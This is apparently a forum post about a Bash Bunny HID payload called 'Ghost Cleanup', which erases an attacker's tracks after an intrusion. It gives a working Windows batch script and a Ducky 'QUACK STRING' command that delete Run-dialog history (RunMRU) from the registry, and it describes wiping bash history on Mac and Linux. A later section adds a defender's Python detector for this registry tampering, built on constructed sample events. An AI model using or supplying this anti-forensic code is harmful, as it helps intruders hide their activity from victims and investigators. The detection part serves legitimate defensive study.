
[Payload] Ghost Cleanup




The goal of this payload is to provide a universal (Win/Mac/Lin) HID script to clean up your tracks after an attack.  The idea is to have this as a switch 2 payload to easily execute after an attack.

Currently, I have code to:

  1. Select OS (Defaults to linux, but can be switched manually or with attack 1, by writing an appropriately named file to the BB loot folder)
  2. Ducky script from E2124 to open cmd/terminal
  3. Clear input history
    1. [mac/linux] Clear all bash history (or optionally set how many lines to remove from the end of ~/.bash_history)
    2. [Win] use regedit to remove run commands
  4. [Win] Remove extra Ethernet adapters created by BB. (*WIP, looking at different methods)
  5. Comments providing guidance on where to insert your custom cleanup code for each platform

Please feel free to fork and contribute!

**  This script is a Work in Progress, as I'm still waiting on my BashBunny to arrive.


Quick and Dirty Solution for Windows


@echo off
setlocal enableextensions enabledelayedexpansion

REM Number of entries to delete from the Registry (batch comments use REM, not #)
set len=3
set /a len_pos=%len%-1

REM Get the MRUList from the Registry and save it to %mru%
for /f "tokens=2*" %%a in ('reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /v MRUList') do set "mru=%%b"
REM Count the characters in %mru% (one letter per RunMRU entry)
for /f %%c in ('cmd /u /v /q /c"(echo(!mru!)" ^| find /v "" ^| findstr /r /c:"[a-z]" ^| find /c /v ""') do set "str_len=%%c"

REM Take the first %len% letters of MRUList (the most recent entries)
set list=!mru:~0,%len%!
REM The remaining letters become the new MRUList
set original_list=!mru:~%len%,%str_len%!

REM Delete old MRUList
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v MRUList /f
REM Add new MRUList
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v MRUList /t REG_SZ /d %original_list%

REM Delete the value for each of the removed letters
for /l %%d in (0,1,%len_pos%) do (reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /v !list:~%%d,1! /f)



PS: You have to put the REG DELETE "Path" in double quotes

QUACK STRING reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f


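From the defender's side, the batch script above leaves a recognisable trace: reg.exe (rather than the shell itself) deleting MRUList, re-creating it shorter, and deleting single-letter values under RunMRU. The following added example (not from this thread; the function name and the event records are my own) groups such registry events per user hive and reports the change set. The sample events are constructed, with field names modelled on Sysmon event IDs 12 (object delete) and 13 (value set); SIDs and paths are placeholders.

```python
import re
from collections import defaultdict

# Constructed sample events, fields modelled on Sysmon registry events.
# The first four mirror the cleanup script; the last is the Run dialog
# (explorer.exe) maintaining the list normally and must not be flagged.
RUNMRU = r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe", "EventType": "DeleteValue",
     "TargetObject": RUNMRU + r"\MRUList"},
    {"Image": r"C:\Windows\System32\reg.exe", "EventType": "SetValue",
     "TargetObject": RUNMRU + r"\MRUList", "Details": "cde"},
    {"Image": r"C:\Windows\System32\reg.exe", "EventType": "DeleteValue",
     "TargetObject": RUNMRU + r"\a"},
    {"Image": r"C:\Windows\System32\reg.exe", "EventType": "DeleteValue",
     "TargetObject": RUNMRU + r"\b"},
    {"Image": r"C:\Windows\explorer.exe", "EventType": "SetValue",
     "TargetObject": RUNMRU + r"\MRUList", "Details": "fcdeab"},
]

# Match RunMRU\MRUList or a single-letter entry, capturing the user hive.
RUNMRU_RE = re.compile(
    r"^(?P<hive>HKU\\[^\\]+)\\Software\\Microsoft\\Windows\\CurrentVersion"
    r"\\Explorer\\RunMRU\\(?P<value>MRUList|[a-z])$", re.IGNORECASE)
# explorer.exe is the normal writer of RunMRU; anything else is worth a look.
TRUSTED_WRITER = r"c:\windows\explorer.exe"

def find_runmru_tampering(events):
    """Return one finding per user hive whose RunMRU was rewritten by a
    process other than explorer.exe, listing what changed."""
    per_hive = defaultdict(lambda: {"mrulist": [], "deleted": [], "images": set()})
    for ev in events:
        m = RUNMRU_RE.match(ev.get("TargetObject", ""))
        if not m or ev["Image"].lower() == TRUSTED_WRITER:
            continue
        rec = per_hive[m.group("hive")]
        rec["images"].add(ev["Image"])
        value = m.group("value")
        if value.lower() == "mrulist":
            rec["mrulist"].append((ev["EventType"], ev.get("Details", "")))
        elif ev["EventType"] == "DeleteValue":
            rec["deleted"].append(value)
    return [{"hive": hive,
             "images": sorted(rec["images"]),
             "mrulist_changes": rec["mrulist"],
             "deleted_entries": sorted(rec["deleted"]),
             "verdict": "RunMRU trimmed or cleared by non-shell process"}
            for hive, rec in per_hive.items()]

if __name__ == "__main__":
    for finding in find_runmru_tampering(SAMPLE_EVENTS):
        print(finding)
```

A `reg delete ... /va /f` wipe shows up the same way, as a burst of DeleteValue events on every letter from one non-shell image.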


I've extracted my debug code to a simple helper with an OFF switch.

I'll eventually do a separate PR for this, but if anyone needs a simple debug helper it currently lives on my `develop` branch.



Edited by bg-wa